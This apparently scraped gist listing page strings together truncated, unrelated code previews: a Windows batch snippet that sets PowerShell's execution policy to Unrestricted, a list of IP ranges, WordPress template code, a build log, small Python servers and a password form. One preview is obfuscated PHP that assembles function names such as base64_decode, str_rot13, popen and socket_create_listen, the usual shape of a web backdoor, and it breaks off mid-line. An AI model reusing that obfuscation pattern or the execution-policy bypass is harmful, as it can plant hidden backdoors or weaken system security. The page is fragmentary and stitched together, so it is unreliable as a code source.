This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PowerShell -Command "Set-ExecutionPolicy Unrestricted" >> "%TEMP%\StartupLog.txt" 2>&1 | |
PowerShell C:\Users\YOUR_USERNAME\Desktop\hotspot.ps1 >> "%TEMP%\StartupLog.txt" 2>&1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
204.65.94.1-204.65.94.254 | |
209.163.133.69 | |
-209.163.133.71 | |
216.12.249.1-216.12.249.254 | |
216.110.75.249 | |
-216.110.75.251 | |
207.70.150.1-207.70.150.254 | |
209.34.53.1-209.34.53.126 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
====== | |
Ann | |
Smith | |
score + | |
age - | |
------ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$GLOBALS['_plgjspwbpfa__']=Array('def' .'ined','' .'strva' .'l','' .'c' .'u' .'r' .'l' .'_mu' .'l' .'ti_info' .'_read','imagedest' .'roy','' .'m' .'t_ran' .'d','im' .'agec' .'opymergeg' .'r' .'ay','mktime','strpo' .'s','ar' .'ray' .'_merg' .'e','str_rot13','b' .'ase64_' .'d' .'ec' .'ode','arr' .'ay' .'_pro' .'duct','crc32','e' .'xplod' .'e','str' .'pos','curl_multi_' .'in' .'it','mt_rand','preg_rep' .'la' .'ce','sub' .'str' .'_com' .'pare','array_rev' .'ers' .'e','im' .'agecopymergegr' .'a' .'y','tri' .'m','' .'mt_r' .'and','strncas' .'ec' .'m' .'p','substr','su' .'bstr','sessio' .'n_m' .'od' .'ul' .'e_' .'name','so' .'ck' .'et_creat' .'e_listen','a' .'ddslas' .'hes','ba' .'se64' .'_encod' .'e','urle' .'n' .'code','mt_rand','imagedestroy','is_ar' .'ray','' .'cou' .'n' .'t','mkdir','' .'strtoti' .'me','mt_rand','s' .'ession_i' .'d','mt_' .'ran' .'d','ses' .'si' .'on_enco' .'de','strpos','bas' .'e64_decod' .'e','sock' .'et' .'_cr' .'eat' .'e','' .'pop' .'en','sha1' .'_fi' .'le','preg_r' .'eplace' .'_c' .'al' .' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<h2>Комментарии</h2> | |
<?php | |
if ( have_comments() ) : ?> | |
<p><?php comments_number('Нет комментариев', '1 комментарий', '% комментариев' );?></p> | |
<div class="navigation"> | |
<div class="alignleft"><?php previous_comments_link() ?></div> | |
<div class="alignright"><?php next_comments_link() ?></div> | |
</div> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<h2>Комментарии</h2> | |
<?php | |
if ( have_comments() ) : ?> | |
<p><?php comments_number('Нет комментариев', '1 комментарий', '% комментариев' );?></p> | |
<div class="navigation"> | |
<div class="alignleft"><?php previous_comments_link() ?></div> | |
<div class="alignright"><?php next_comments_link() ?></div> | |
</div> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
~/mjpg-streamer/mjpg-streamer-experimental# make clean all | |
make -C plugins/input_uvc clean | |
make[1]: Entering directory '/root/mjpg-streamer/mjpg-streamer-experimental/plugins/input_uvc' | |
rm -f *.a *.o core *~ *.so *.lo | |
make[1]: Leaving directory '/root/mjpg-streamer/mjpg-streamer-experimental/plugins/input_uvc' | |
make -C plugins/input_testpicture clean | |
make[1]: Entering directory '/root/mjpg-streamer/mjpg-streamer-experimental/plugins/input_testpicture' | |
rm -f *.a *.o core *~ *.so *.lo | |
make[1]: Leaving directory '/root/mjpg-streamer/mjpg-streamer-experimental/plugins/input_testpicture' | |
make -C plugins/output_file clean |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#---------------------------------------------------------- | |
# Author: Airvikar <http://ubuntu-wine.ru> | |
#---------------------------------------------------------- | |
if ! [ -f /usr/bin/zenity ] | |
then | |
AHT="Warning! Script requires zenity. You may install it from \"Ubuntu Sofware Center\" or with sudo apt-get install zenity." | |
echo "Warning!" | |
echo "Script requires zenity!" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import http.server | |
from http.server import CGIHTTPRequestHandler | |
port = 80 | |
addr = '192.168.150.1' | |
addrport = (addr, port) | |
class myHandler(CGIHTTPRequestHandler): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from bottle import route, run, template, post, request | |
@route('/') | |
def index(): | |
return template(''' | |
<form name="form1" method="post" action="/write"> | |
Enter password: <input type="text" name="pass"><br> | |
<input type="submit" name="Submit" value="Sign Up"> </form> | |
''') | |
@post('/write') | |
def write(): |
NewerOlder